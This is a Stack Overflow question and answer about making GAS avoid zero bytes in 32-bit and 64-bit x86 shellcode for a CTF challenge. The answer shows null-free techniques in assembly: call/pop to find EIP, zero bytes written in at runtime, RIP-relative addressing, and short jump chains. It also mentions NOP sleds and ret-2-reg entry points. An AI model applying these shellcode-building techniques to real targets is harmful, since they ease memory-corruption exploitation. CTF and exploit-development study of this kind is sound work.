问题
I am trying to write shellcode for a CTF challenge that does not allow for 0x00 bytes (it will be interpreted as a terminator). Due to restrictions in the challenge, I must do something like this:
[shellcode bulk]
[(0x514 - sizeof(shellcode bulk)) filler bytes]
[fixed constant data to overwrite global symbols]
[shellcode data]
It looks something like this
.intel_syntax noprefix
.code32
shellcode:
jmp sc_data
shellcode_main:
#open
xor eax, eax
pop ebx //file string
xor ecx, ecx //flags
xor edx, edx //mode
mov al, 5 //sys_OPEN
int 0x80
... // more shellcode
.org 514, 0x41 // filler bytes
.long 0xffffffff // bss constant overwrite
sc_data:
call shellcode_main
.asciz "/path/to/fs/file"
This works beautifully if sc_data
is within 127 bytes of shellcode
. In this case the assembler (GAS) will output a short jump of format:
Opcode Mnemonic
EB cb JMP rel8
However, since I have a hard restriction that I need 0x514 bytes for the bulk shellcode and filler bytes, this relative offset will need at least 2-bytes. This would also work because there is a 2-byte relative encoding for the jmp
instruction:
Opcode Mnemonic
E9 cw JMP rel16
Unfortunately, GAS does not output this encoding. Rather it uses the 4-byte offset encoding:
Opcode Mnemonic
E9 cd JMP rel32
This results in two MSB bytes of zeros. Something similar to:
e9 01 02 00 00
My question is: can GAS be forced to output the 2-byte variant of the jmp
instruction? I toyed around with multiple smaller 1 byte jmp
s, but GAS kept outputting the 4-byte variant. I also tried invoking GCC with -Os
to optimize for size, but it insisted on using the 4-byte relative offset encoding.
Intel jump opcode defined here for reference.
回答1:
jmp rel16
is only encodeable with an operand-size of 16, which truncates EIP to 16 bits. (The encoding requires a 66
operand-size prefix in 32 and 64-bit mode). As described in the instruction-set reference you linked, or in this more up-to-date PDF->HTML conversion of Intel's manual, jmp
does EIP ← tempEIP AND 0000FFFFH;
when the operand-size is 16. This is why assemblers never use it unless you manually request it1, and why you can't use jmp rel16
in 32 or 64-bit code except in the very unusual case where the target is mapped in the low 64kiB of virtual address space2.
Avoiding jmp rel32
You're only jumping forward so you can use call rel32
to push the address of your data, and because you want your data all the way at the end of your long padded payload.
You could construct a string on the stack with push imm32/imm8/reg
and mov ebx, esp
. (You already have a zeroed register you can push for the terminating zero byte).
If you don't want to construct data on the stack, and instead use data that's part of your payload, use position-independent code / relative addressing for it. Perhaps you have a value in a register that's a known offset from EIP, e.g. if your exploit code was reached with a jmp esp
or other ret-2-reg attack. In that case, you might be able to justmov ecx, 0x12345678
/ shr ecx, 16
/ lea ebx, [esp+ecx]
.
Or, if you had to use a NOP sled and you don't know the exact value of EIP relative to any register value, you can obtain the current value of EIP with a call
instruction with a negative displacement. Jump forward over the call
target, then call
back to it. You can put data right after that call
. (But avoiding zero bytes in the data is inconvenient; you can store some once you get a pointer to it.)
# Position-independent 32-bit code to find EIP
# and get label addresses into registers
# and insert zeros into data that we jumped over.
jmp .Lcall
.Lget_eip:
pop ebx
jmp .Lafter_call # jmp rel8
.Lcall: call .Lget_eip # backward rel32 = 0xffffff??
# execution never returns here
.Lmsg: .ascii "/path/to/fs/file/" # last byte to be overwritten
msglen = . - .Lmsg
.Loffset_data2: .long .Ldata2 - .Lmsg # relative offset to other data, or make this a 16-bit int to avoid zeros
# max data size 127 - 5 bytes
.Lafter_call:
# EBX = OFFSET .Lmsg just from the call + pop
# Insert a zero at runtime because the data wasn't at the end of the payload
mov byte ptr [ebx+ msglen - 1], al # with al=0
# ESI = OFFSET .Ldata2 using an offset loaded from memory
mov esi, ebx
add esi, [ebx + .Loffset_data2 - .Lmsg] # [ebx + disp8]
# with an immediate displacement, avoiding zero bytes
mov ecx, ((.Ldata3 - .Lmsg) << 17) | 0xffff
shr ecx, 17 # choose shift count to avoid high zeros
lea edi, [ebx + ecx] # edi = OFFSET .Ldata3
# if disp8 doesn't work but 8 * disp8 does: small code size
push (.Ldata3 - .Lmsg)>>8 # push imm8
pop ecx
lea edi, [ebx + ecx*8 + (.Ldata3 - .Lmsg)&7] # disp8 of the low 3 bits
...
# at the end of your payload
.Ldata2:
whatever you want, arbitrary size
.Ldata3:
In 64-bit code, it's much easier:
# In 64-bit code
jmp .Lafter_data
.Lmsg1: .ascii "/foo/bar/" # last bytes to be replaced
.Lmsg2: .ascii "/bin/sh/"
.Lafter_data:
lea rdi, [RIP + .Lmsg1] # negative rel32
lea rsi, [rdi + .Lmsg2 - .Lmsg1] # disp8
xor eax,eax
mov byte ptr [rsi - 1], al # insert zeros
mov byte ptr [rsi + len], al
Or use a RIP-relative LEA to get a label address and use some zero-avoiding method to add an immediate constant to it to get the address of a label at the end of your payload.
.Lbase:
lea rdi, [RIP + .Lbase]
xor ecx,ecx
mov cx, .Lpath - .Lbase
add rdi, rcx # RDI = .Lpath address
...
syscall
... # more than 128 bytes
.Lpath:
.asciz "/foo/bar"
If you really needed to jump far, instead of just position-independent addressing of far-away "static" data.
A chain of short forward jumps would work.
Or use any of the above methods to find the address of a later label in a register, and use jmp eax
.
Saving code bytes:
In your case, saving code size doesn't help you avoid long jump displacements, but probably for some other people it will:
You can save code bytes using these Tips for golfing in x86/x64 machine code:
xor eax,eax
/cdq
saves 1 byte vs.xor edx,edx
.xor ecx, ecx
/mul ecx
zeroes three registers in 4 bytes (ECX and EDX:EAX)- Actually, your best bet for that
int 0x80
setup is probablyxor ecx,ecx
(2B) /lea eax, [ecx+5]
(3B) /cdq
(1B), and don't usemov al,5
at all. You can put arbitrary small constants in registers in only 3 bytes withpush imm8
/pop
, or with onelea
if you have another register with a known value.
Footnote 1: asking your assembler to encode jmp rel16
outside of 16-bit mode:
NASM (in 16, 32 or 64-bit mode)
addr:
; times 256 db 0 ; padding to make it jump farther.
o16 jmp near addr ; force 16-bit operand-size and near (not short) displacement
AT&T syntax:
objdump -d
decodes it as jmpw
: For the above NASM source assembled into a 32-bit static ELF binary, objdump -drwC foo
shows the truncation of EIP:
0000000000400080 <addr>:
400080: 66 e9 fc ff jmpw 80 <addr-0x400000>
But GAS seems to think that mnemonic is only for indirect jumps (where it would mean a 16-bit load). (foo.S:5: Warning: indirect jmp without '*'
), and this GAS source: .org 1024; addr: .zero 128; jmpw addr
gives you
480: 66 ff 25 00 04 00 00 jmpw *0x400 483: R_386_32 .text
See what is jmpl instruction in x86? - this insane inconsistency in how GAS handles AT&T syntax applies even to jmpl
. Plain jmp 0x400
when assembling in 16-bit mode would be a relative jump to that absolute offset.
In the extremely unlikely case you wanted a jmp rel16
in other modes, you'd have to assemble it yourself with .byte
and .short
. I don't think there's even a way to get the assembler to emit it for you.
Footnote 2: You can't use jmp rel16
in 32/64-bit code, unless you're attacking some code mapped in the low 64kiB of virtual address space, e.g. maybe something running under DOSEMU or WINE. Linux's default setting for /proc/sys/vm/mmap_min_addr is 65536, not 0, so normally nothing can mmap
that memory even if you want to, or presumably load its text segment at that address via the ELF program loader. (So NULL-pointer dereferences with an offset segfault instead of silently accessing memory).
You can be sure that your CTF target won't happen to be running with EIP = IP, and that truncating EIP to IP will just segfault.
来源:https://stackoverflow.com/questions/50341094/gas-assembler-not-using-2-byte-relative-jmp-displacement-encoding-only-1-byte-o